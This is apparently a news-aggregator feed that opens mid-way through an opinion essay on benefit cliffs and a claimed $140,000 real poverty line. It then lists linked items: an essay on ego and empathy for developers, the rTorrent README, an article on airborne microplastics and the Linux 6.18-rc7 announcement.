The family earns a $10,000 raise. Good news? No. At this level, the parents lose Medicaid eligibility. Suddenly, they must pay premiums and deductibles.

  • Income Gain: +$10,000

  • Expense Increase: +$10,567

  • Net Result: They are poorer than before. The effective tax on this mobility is over 100%.

3. The Cliff at $65,000 (The Childcare Trap)

This is the breaker. The family works harder. They get promoted to $65,000. They are now solidly “Working Class.”

But at roughly this level, childcare subsidies vanish. They must now pay the full market rate for daycare.

  • Income Gain: +$20,000 (from $45k)

  • Expense Increase: +$28,000 (jumping from co-pays to full tuition)

  • Net Result: Total collapse.

When you run the net-income numbers, a family earning $100,000 is effectively in a worse monthly financial position than a family earning $40,000.
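
Here is the cliff arithmetic behind that claim, sketched in Python from the income gains and expense jumps listed above; it is a simplification that ignores payroll and income taxes, which only make the cliffs steeper.

  cliffs = [
      # (label, income gain, added annual expenses when benefits vanish)
      ("$35k to $45k: lose Medicaid", 10_000, 10_567),
      ("$45k to $65k: lose childcare subsidy", 20_000, 28_000),
  ]

  for label, gain, added_cost in cliffs:
      # ~106% and ~140%: each raise leaves the family with less than before
      print(f"{label}: effective marginal rate ~{added_cost / gain:.0%}")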

At $40,000, you are drowning, but the state gives you a life vest. At $100,000, you are drowning, but the state says you are a “high earner” and ties an anchor to your ankle called “Market Price.”

In option terms, the government has sold a call option to the poor, but they’ve rigged the gamma. As you move “closer to the money” (self-sufficiency), the delta collapses. For every dollar of effort you put in, the system confiscates 70 to 100 cents.

No rational trader would take that trade. Yet we wonder why labor force participation lags. It’s not a mystery. It’s math.

The most dangerous lie of modern economics is “Mean Reversion.” Economists assume that if a family falls into debt or bankruptcy, they can simply save their way back to the average.

They are confusing Volatility with Ruin.

Falling below the line isn’t like cooling water; it’s like freezing it. It is a Phase Change.

When a family hits the barrier—eviction, bankruptcy, or default—they don’t just have “less money.” They become Economically Inert.

  • They are barred from the credit system (often for 7–10 years).

  • They are barred from the prime rental market (landlord screens).

  • They are barred from employment in sensitive sectors.

In physics, it takes massive “Latent Heat” to turn ice back into water. In economics, the energy required to reverse a bankruptcy is exponentially higher than the energy required to pay a bill.

The $140,000 line matters because it is the buffer against this Phase Change. If you are earning $80,000 with $79,000 in fixed costs, you are not stable. You are super-cooled water. One shock—a transmission failure, a broken arm—and you freeze instantly.

If you need proof that the cost of participating, the cost of working, is the primary driver of this fragility, look at the Covid lockdowns.

In April 2020, the US personal savings rate hit a historic 33%. Economists attributed this to stimulus checks. But the math tells a different story.

During lockdown, the “Valley of Death” was temporarily filled.

  • Childcare ($32k): Suspended. Kids were home.

  • Commuting ($15k): Suspended.

  • Work Lunches/Clothes ($5k): Suspended.

For a median family, the “Cost of Participation” in the economy is roughly $50,000 a year. When the economy stopped, that tax was repealed. Families earning $80,000 suddenly felt rich—not because they earned more, but because the leak in the bucket was plugged. For many, income actually rose thanks to the $600/week unemployment boost. But even those whose income stayed flat felt rich, because so many costs were simply avoided.
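
That “roughly $50,000” is simply the sum of the suspended items above, as a trivial Python check:

  suspended = {
      "childcare": 32_000,
      "commuting": 15_000,
      "work lunches and clothes": 5_000,
  }

  print(sum(suspended.values()))   # 52,000 a year: the participation cost that paused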

When the world reopened, the costs returned, but now inflated by 20%. The rage we feel today is the hangover from that brief moment where the American Option was momentarily back in the money. Those with formal training in economics have dismissed these concerns, by and large. “Inflation” is the rate of change in the price level; these poor, deluded souls were outraged at the price LEVEL. Tut, tut… can’t have deflation now, can we? We promise you will like THAT even less.

But the price level does mean something, too. If you are below the ACTUAL poverty line, you are suffering constant deprivation; and a higher price level means you get even less in aggregate.

You load sixteen tons, what do you get?
Another day older and deeper in debt
Saint Peter, don’t you call me, ‘cause I can’t go
I owe my soul to the company store — Merle Travis, 1946

This mathematical valley explains the rage we see in the American electorate, specifically the animosity the “working poor” (the middle class) feel toward the “actual poor” and immigrants.

Economists and politicians look at this anger and call it racism, or lack of empathy. They are missing the mechanism.

Altruism is a function of surplus. It is easy to be charitable when you have excess capacity. It is impossible to be charitable when you are fighting for the last bruised banana.

The family earning $65,000—the family that just lost their subsidies and is paying $32,000 for daycare and $12,000 for healthcare deductibles—is hyper-aware of the family earning $30,000 and getting subsidized food, rent, childcare, and healthcare.

They see the neighbor at the grocery store using an EBT card while they put items back on the shelf. They see the immigrant family receiving emergency housing support while they face eviction.

They are not seeing “poverty.” They are seeing people getting for free the exact things that they are working 60 hours a week to barely afford. And even worse, even if THEY don’t see these things first hand… they are being shown them:

The anger isn’t about the goods. It’s about the breach of contract. The American Deal was that Effort ~ Security. Effort brought your Hope strike closer. But because the real poverty line is $140,000, effort no longer yields security or progress; it brings risk, exhaustion, and debt.

When you are drowning, and you see the lifeguard throw a life vest to the person treading water next to you—a person who isn’t swimming as hard as you are—you don’t feel happiness for them. You feel a homicidal rage at the lifeguard.

We have created a system where the only way to survive is to be destitute enough to qualify for aid, or rich enough to ignore the cost. Everyone in the middle is being cannibalized. The rich know this… and they are increasingly opting out of the shared spaces:

If you need visual proof of this benchmark error, look at the charts that economists love to share on social media to prove that “vibes” are wrong and the economy is great.

You’ve likely seen this chart. It shows that the American middle class is shrinking not because people are getting poorer, but because they’re “moving up” into the $150,000+ bracket.

The economists look at this and cheer. “Look!” they say. “In 1967, only 5% of families made over $150,000 (adjusted for inflation). Now, 34% do! We are a nation of rising aristocrats.”

But look at that chart through the lens of the real poverty line.

If the cost of basic self-sufficiency for a family of four—housing, childcare, healthcare, transportation—is $140,000, then that top light-blue tier isn’t “Upper Class.”

It’s the Survival Line.

This chart doesn’t show that 34% of Americans are rich. It shows that only 34% of Americans have managed to escape deprivation. It shows that the “Middle Class” (the dark blue section between $50,000 and $150,000)—roughly 45% of the country—is actually the Working Poor. These are the families earning enough to lose their benefits but not enough to pay for childcare and rent. They are the ones trapped in the Valley of Death.

But the commentary tells us something different:

“Americans earned more for several reasons. The first is that neoliberal economic policies worked as intended . In the last 50 years, there have been big increases in productivity, solid GDP growth and, since the 1980s, low and predictable inflation. All this helped make most Americans richer.”

“neoliberal economic policies worked as intended” — read that again. With POSIWID (the purpose of a system is what it does) in mind.

The chart isn’t measuring prosperity. It’s measuring inflation in the non-discretionary basket. It tells us that to live a 1967 middle-class life in 2024, you need a “wealthy” income.

And then there’s this chart, the shield used by every defender of the status quo:

Poverty has collapsed to 11%. The policies worked as intended!

But remember Mollie Orshansky. This chart is measuring the percentage of Americans who cannot afford a minimum food diet multiplied by three.

It’s not measuring who can afford rent (which is up 4x relative to wages). It’s not measuring who can afford childcare (which is up infinite percent). It’s measuring starvation.

Of course the line is going down. We are an agricultural superpower that opened our markets to even cheaper foreign food. Shrimp from Vietnam, tilapia from… don’t ask. Food is cheap. But life is expensive.

When you see these charts, don’t let them gaslight you. They are using broken rulers to measure a broken house. The top chart proves that you need $150,000 to make it. The bottom chart proves they refuse to admit it.

So that’s the trap. The real poverty line—the threshold where a family can afford housing, healthcare, childcare, and transportation without relying on means-tested benefits—isn’t $31,200.

It’s ~$140,000.

Most of my readers will have cleared this threshold. My parents never really did, but I was born lucky — brains, beauty (in the eye of the beholder admittedly), height (it really does help), parents that encouraged and sacrificed for education (even as the stress of those sacrifices eventually drove my mother clinically insane), and an American citizenship. But most of my readers are now seeing this trap for their children.

And the system is designed to prevent them from escaping. Every dollar you earn climbing from $40,000 to $100,000 triggers benefit losses that exceed your income gains. You are literally poorer for working harder.

The economists will tell you this is fine because you’re building wealth. Your 401(k) is growing. Your home equity is rising. You’re richer than you feel.

Next week, I’ll show you why that’s wrong. And THEN we can start the discussion of how to rebuild. Because we can.

The wealth you’re counting on—the retirement accounts, the home equity, the “nest egg” that’s supposed to make this all worthwhile—is just as fake as the poverty line. But the humans behind that wealth are real. And they are amazing.

A Unified Theory of Ego, Empathy, and Humility at Work

Hacker News
matthogg.fyi
2025-11-24 02:01:02
Comments...
Original Article

In our daily lives empathy and humility are obvious virtues we aspire to. They keep our egos in check. Less obvious is that they’re practical skills in the workplace, too. I think, for developers and technical leaders in particular, that the absence of ego is the best way to further our careers and do great work.

In the simplest of terms the ego is the characteristic of personhood that enables us to practice self-reflection, self-awareness, and accountability for the actions or decisions we take.

However, the ego also motivates us to reframe our perception of the world in whatever way keeps us centered in it. Each of us is perpetually driven to justify our place in the world. This constant self-justification is like an engine that idles for our entire lives, and it requires constant fine-tuning. When it runs amok this is what we call a “big” ego.

Breaking News! Developers Have Egos!

I’m not thinking only of the 10x engineer stereotype, although I’ve worked with such folks in the past. Ego is more nuanced than that. Besides the most arrogant developer in the room throwing their weight around, our egos manifest in hundreds of ways that are much harder to detect.

As developers we’re more susceptible to letting our egos run free. The nature of our work is so technical that to others it can seem obscure, arcane, or even magical. Sometimes we don’t do enough to actively dispel that notion—and just like that half the work of self-justification is already done for us.

Very often it’s not intentional. The simplest example is the overuse of jargon and acronyms. We all do it, but as Jeremy Keith explains:

Still, I get why initialisms run rampant in technical discussions. You can be sure that most discussions of particle physics would be incomprehensible to outsiders, not necessarily because of the concepts, but because of the terminology.

Simply mashing a few letters together can be empowering for ourselves while being exclusionary for others. It’s an artifact—albeit a small one—of our egos. We know what the technobabble means. Our justified place in the universe is maintained.

Sometimes we express our egos more deliberately. Developers have a clear tendency towards gatekeeping. For most, it’s an honest mistake. There’s a fine line between holding others to a certain expectation versus actively keeping people on the outside. When we see ourselves doing this we can correct it easily enough.

Sadly there are developers who seemingly like to gatekeep. They get to feel like wizards in their towers with their dusty books and potions. But, it’s actually self-limiting. Gatekeeping by definition means you’re fixed in place and never moving, standing guard for eternity.

My point is our egos can “leak” in so many ways that it takes diligence to catch it, let alone correct it. The following is a short, incomplete list of typical statements we as developers might say or hear at work. If you parse them more precisely, each one is an attempt at self-justification:

  • “That’s the way we’ve always done it.”
  • “It’s not that complicated! You just…”
  • “Yeah, I should be able to finish this in a day.”
  • “This legacy codebase is an absolute disaster.”
  • “Assign it to me. Nobody else will be able to fix it.”
  • “You can’t be a senior dev. You don’t know anything about…”
  • “Ugh, our morning standup is so useless.”
  • “This feature is too important to assign to the junior dev.”
  • “We should start using this new tool in our pipeline.”
  • “We should never use that new tool in our pipeline.”

Everything Is Bigger Than You

The ego is concerned with the self but very easily becomes something harmful in the absence of new information or context. Indeed, the ego nudges us to self-justify so much that one could argue it actively resists new information when left unchecked.

You may have read one of the example statements above with some familiarity and thought, “But what if I’m right?”

To which I’d say: OK, but should that be your default stance? Why might you feel the need to immediately start a conversation with a self-justification? There are ways to adjust our approach, make our points, and accept new information all at the same time.

In any interaction—be it a meeting, Slack thread, or water cooler conversation—we must remember that the matter at hand is bigger than us in ways we don’t yet understand.

This is a simple enough heuristic, but we need the skills to gain that understanding. We need empathy and humility. Empathy is the ability to recognize and comprehend what someone else is thinking or feeling. Humility is a resistance to our “competitive reflexes” through the practice of emotional neutrality and vulnerability. Both serve to counteract the ego.

To make these concepts more actionable I find it simpler to define them in terms of the purposes they serve. Specifically…

  1. Empathy is how we gather new information.
  2. Humility is how we allow information to change our behavior.

This framing also helps remind us what empathy and humility are not. It’s not about putting yourself in another’s shoes, as the saying goes. It’s not about being submissive or a pushover. It’s not about altruism or self-sacrifice. We can easily practice empathy and humility without it ever being at our own expense.

The Pursuit Of Information

I don’t know about you but I go to work to solve problems, be creative, and build shit. I can’t think of a single instance where an unruly ego solved anything I’ve worked on. Ego just makes an existing challenge worse. Solutions require information I don’t have yet.

Empathy and humility are usually top of mind during situations of pain or distress, but they’re really aspects of emotional intelligence that should be activated at all times. Once you adjust your mindset to treat them as basic tools for the pursuit of information you’ll see opportunities to leverage them everywhere.

Developers can apply this mindset with almost anybody they come into contact with. Fellow developers, naturally. But also less technical teammates (e.g., QAs, designers, product owners, stakeholders) who have their own unique skills and context that our success depends on. And of course our users should be at the center of every problem we’re working to solve. Lastly, even executives and upper management have some insight to offer if you dare (but only up to a certain point).

“Be Curious, Not Judgmental”

I’ve been waiting years for a chance to work Ted Lasso into one of my essays. Today’s the day, readers.

The titular character is such an archetype for leadership that my jaw hit the floor when I first watched the show. The example Ted sets has spawned countless think pieces about leadership and management . Suffice it to say he exhibits all of my principles over the series’ 34 episodes. He’s empathy and humility sporting a mustache. He’s the absence of ego personified.

I highly recommend watching the show, but to get a taste, this 5-minute clip is worth your time. This is the famous “darts scene”…

There’s a common and derisive attitude that qualities like empathy or humility are signs of weakness. You have to get all up in your feelings. Ew! But they require enormous reserves of strength, patience, and determination. It’s those who follow their egos who are weak.

Letting your ego take control is the easiest thing in the world. Just ask any toddler throwing a temper tantrum. Resisting those impulses and remaining calm, on the other hand, has been a virtue humanity has aspired to for thousands of years. As the Roman emperor and Stoic philosopher Marcus Aurelius wrote: “The nearer a man comes to a calm mind, the closer he is to strength.”

You’re Neither Ted Lasso Nor A Roman Emperor

The practice of empathy, humility, and keeping your ego in check will test you daily. The feedback I’ve received the most from my coworkers is that I’m extraordinarily calm and even-keeled in any situation—even situations where I’d be right to freak out.

Is that just naturally my personality? Maybe in part, but remaining calm is a choice. I’m actively choosing to favor solutions over my own ego. To my colleagues past and present, I confess to you now that any time you’ve seen me calm, cool, and collected, I was very likely internally screaming.

If this sounds like a lot of work you might be wondering if it’s worth it. I think it is. At the very least your coworkers and colleagues will like you better. That’s no small thing.

In all seriousness, the positive feedback I get most about the developers I manage is when they’ve demonstrated empathy and humility while dialing back their egos. This is because they’re people we can work with—literally. Nobody wants to work with a narcissist or a rock star. Nobody is materially impressed by how many lines of code we wrote, or how fast we wrote it.

When people want to work with us—or even look forward to it—that means we have trust and respect. We’ll be on proper footing for working effectively as a group to solve problems. For developers this looks like coaching a junior developer, hopping on a quick call to pair with somebody, or understanding the business value of the next backlog item. For leaders this looks like people who feel empowered to do their work, who can proactively identify issues, or who can rally and adapt when circumstances change.

Anybody can do this! I can’t think of any other career advice that’s as universal as empathy and humility. Everybody is capable of, at any point in their lives, small yet impactful improvements.

So remember—watch your ego and look for opportunities to leverage empathy and humility in the pursuit of information so that you can solve problems together.

In my next essay on this subject I’ll get into the practical. What I like about this advice is that, while there’s much we can do, we don’t have to do it all to see some benefit. We can pick and choose and try something out. We can take our time and grow. Nobody’s perfect, not even Ted Lasso. Even if we take after a character like Roy Kent, we can still call that a win. Just watch the show, OK?

An open-source photo editor & digital compositor for the web

Lobsters
mint.photo
2025-11-24 01:57:44
Source: https://github.com/mosaiq-software/mint Comments...

A ncurses-based command line torrent client for high performance

Hacker News
github.com
2025-11-24 01:30:51
Comments...
Original Article

RTorrent BitTorrent Client

Introduction

A ncurses-based command line torrent client for high performance.

To learn how to use rTorrent, visit the Wiki.

Download the latest stable release

Related Projects

Donate to rTorrent development

  • Paypal
  • Patreon
  • SubscribeStar
  • Bitcoin: 1MpmXm5AHtdBoDaLZstJw8nupJJaeKu8V8
  • Ethereum: 0x9AB1e3C3d8a875e870f161b3e9287Db0E6DAfF78
  • Litecoin: LdyaVR67LBnTf6mAT4QJnjSG2Zk67qxmfQ
  • Cardano: addr1qytaslmqmk6dspltw06sp0zf83dh09u79j49ceh5y26zdcccgq4ph7nmx6kgmzeldauj43254ey97f3x4xw49d86aguqwfhlte

Help keep rTorrent development going by donating to its creator.

BUILDING

Jump into the github cloned directory

Install build dependencies

Install libtorrent with the same version as rTorrent.

Generate configure scripts:

Optionally, generate man pages:

docbook2man rtorrent.1.xml

Man pages output to "doc/rtorrent.1".

RTorrent follows the development of libtorrent closely, and thus the versions must be in sync.

USAGE

Refer to User Guide: https://github.com/rakshasa/rtorrent/wiki/User-Guide

LICENSE

GNU GPL, see COPYING. "libtorrent/src/utils/sha_fast.{cc,h}" is originally from the Mozilla NSS and is under a triple license: MPL, LGPL, and GPL. An exception to non-NSS code has been added for linking to OpenSSL as requested by Debian, though the author considers that library to be part of the Operating System and thus linking is allowed according to the GPL.

Use whatever fits your purpose, the code required to compile with Mozilla's NSS implementation of SHA1 has been retained and can be compiled if the user wishes to avoid using OpenSSL.

DEPENDENCIES

  • libcurl >= 7.12.0
  • libtorrent = (same version)
  • ncurses

BUILD DEPENDENCIES

  • libtoolize
  • aclocal
  • autoconf
  • autoheader
  • automake

'Invisible' microplastics spread in skies as global pollutant

Hacker News
www.asahi.com
2025-11-24 00:18:21
Comments...
Original Article

Minuscule airborne plastic particles are spreading to all corners of the planet, penetrating deep into human bodies and sparking alarm among researchers of the relatively new subject matter.

Studies are shedding light on the origins, transport mechanisms and impact of these pollutant microplastics, which are too small to be seen with the naked eye.

They have been found in skies above Mount Fuji, in European rain, Arctic snow and within human bodies. These byproducts of human activity could also be fueling extreme weather conditions.

“Marine microplastic pollution has drawn so much attention that the ocean has been assumed as the final destination for microplastics, but recent studies indicate that airborne plastic pollution is spreading at an alarming rate,” said Hiroshi Okochi, a Waseda University professor of environmental chemistry.

Okochi leads a research team that has been studying airborne microplastics since 2017 and was the first to show that the pollutants had made their way into cloud water.

According to studies conducted on how plastic waste is damaging marine creatures and the ocean environment, plastic litter that flows into seas degrades into “marine microplastics,” which measure 5 millimeters or less in particle size.

By contrast, few studies are available on “airborne microplastics,” most of which measure less than 2.5 micrometers (0.0025 millimeter) across.

One study published in 2016 found plastics in fiber form in rainwater in Paris, showing that plastic particles were wafting in the air.

Okochi’s team in 2023 published a study that showed water in clouds covering the top of Mount Fuji contained 6.7 pieces of microplastics per liter.

Airborne microplastics travel in different manners at different altitudes.

In the free troposphere, an atmospheric layer extending above an altitude of 2,000 to 2,500 meters, substances are transported intercontinentally over long distances by prevailing westerly winds and other air currents. They are rarely affected by things on the ground.

The microplastic particles found above 3,776-meter-tall Mount Fuji where clouds can form were carried far from their sources, Okochi’s team said.

POSSIBLE CAUSE OF TORRENTIAL DOWNPOURS

According to one theory, when a large-scale atmospheric depression forms and generates ascending air currents, ground-based and seaborne microplastics are swirled up by the wind and sea spray and carried high up into the skies.

Once in the free troposphere, strong winds push the microplastics to higher levels and at enormous speeds, polluting the layer.

A team of scientists from Germany and Switzerland reported that they had found more than 10,000 pieces of microplastics per liter of snow in the Arctic. They said such microplastics are likely traveling over long distances in the air and being deposited with snow.

Microplastics may even be inducing cloud formation.

Clouds naturally form when dust serves as nuclei for water vapor to condense on. Typical ingredients of plastic products, such as polyethylene and polypropylene, naturally repel water.

Microplastics, however, change in chemical structure and obtain hydrophilicity, or affinity for water, when they are degraded by ultraviolet rays.

That likely facilitates cloud formation through vapor condensation, Okochi said.

Some experts say microplastics could be causing sudden torrential downpours and other extreme weather phenomena.

Studies have also found that microplastics, when degraded by ultraviolet rays, emit greenhouse gases, such as methane and carbon dioxide.

PLASTICS ENTERING LUNGS

Although plastics have been found in various regions of the human body, it is not yet known what impact the airborne substances have on health.

Airborne microplastic particles measuring 1 micrometer (0.001 millimeter) or less in size are believed capable of reaching the alveoli of the lung.

A study conducted in Britain said microplastics were detected in 11 of 13 lung tissue samples from patients who underwent lung surgeries. The highest levels were found in the lowermost region of the lung.

A human breathes more than 20,000 times a day, which adds up to 600 million to 700 million times throughout a lifetime.

There is no standard method for measuring airborne microplastics, so estimated amounts being inhaled by humans vary wildly from one research article to another.

Okochi said he hopes to develop a unified method for measuring the shapes, types, sizes and concentrations of airborne plastics so researchers across the globe can use it in their observations.

“We inevitably end up inhaling airborne microplastics without knowing it because the pollution they are causing is invisible,” Okochi said. “So little is clearly known about their possible impact on health and the environment, which is only beginning to be discussed. There should be more fact-finding studies on the matter.”

HOPES ON FOREST ADSORPTION

Airborne microplastics come from various sources, including road dust, tire abrasions, artificial turf and clothing.

Effective measures to reduce exposure include avoiding the use of synthetic fiber clothes and washing clothes in mesh laundry bags to prevent the garments from rubbing together.

In the larger picture, society could reflect on whether certain plastic products in close surroundings are really necessary or could be replaced with non-plastic materials.

For airborne plastics that are too small to be visible, absorption by forests is drawing attention as a hopeful measure.

A group of researchers, including Okochi and scientists from Japan Women’s University, found that “konara” oak leaves adsorb airborne plastics through “epicuticular wax,” a coating layer on the leaf surface that defends the tissue from ultraviolet rays and external enemies.

Konara forests in Japan can absorb an estimated 420 trillion pieces of airborne microplastics a year, Okochi said.

His team is now studying the use of fast-growing paulownia trees to fight the airborne microplastics.

There are hopes this tree variety can address other environmental problems. The trees absorb large volumes of carbon dioxide and can be used to absorb radioactive substances in the soil in Fukushima Prefecture, the site of the 2011 nuclear disaster.

“Planting the trees on the roadside could help reduce inhalation by humans,” Okochi said. “We hope to pursue the potential of this new emissions reduction measure using fast-growing paulownia trees to lower the risk of human exposure.”

Kernel prepatch 6.18-rc7

Linux Weekly News
lwn.net
2025-11-24 00:10:02
Linus has released 6.18-rc7, probably the last -rc before the 6.18 release. So the rc6 kernel wasn't great: we had a last-minute core VM regression that caused people problems. That's not a great thing late in the release cycle like that, but it was a fairly trivial fix, and the cause wasn't ...
Original Article

Linus has released 6.18-rc7 , probably the last -rc before the 6.18 release.

So the rc6 kernel wasn't great: we had a last-minute core VM regression that caused people problems.

That's not a great thing late in the release cycle like that, but it was a fairly trivial fix, and the cause wasn't some horrid bug, just a latent gotcha that happened to then bite a late VM fix. So while not great, it also doesn't make me worry about the state of 6.18. We're still on track for a final release next weekend unless some big new problem rears its ugly head.